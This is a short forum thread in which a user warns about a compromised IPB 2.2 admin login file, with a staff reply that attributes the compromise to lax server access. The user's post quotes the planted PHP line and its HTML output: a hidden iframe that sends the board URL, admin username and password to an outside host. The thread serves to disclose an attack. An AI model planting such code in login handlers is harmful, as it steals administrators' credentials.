Exploit warning

[jdtate78]

Hello,

I have a client, more a friend actually who has an IPB 2.2 install, anyway he contacted me as he couldnt get into his ACP, it just hung and did not redirect, he didnt have time to wait for support or anything so I took a look.

Upon submitting admin log in details I found the browser attempting to connect to this site http://zybez.ath.cx particularly a php file called connector.php at this URL http://zybez.ath.cx/connector.php, when I looked at the source code I found the following:

<script>window.stuats='';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=http://site.com/ipbforum&user=administrator&pass=PASSWORDREMOVED\"></div>

As you can see it look like this exploit is sending admin login details straight to the hackers website. After doing some more poking around in the IPB files i found the following code in sources/action_admin/login.php on line 226

$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframesrc="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';

Im guessing this code isnt part of the original IPB files?

Once the code wsa removed all was well.

Bye

[bfarber]

Would mean the "hacker" had direct access to the file code - either via FTP, or by being hosted on the same server, and security settings being lax (open_basedir off, file chmod 777, etc.).

This is not a support forum, however, I'm afraid. Your friend will need to submit a ticket for support.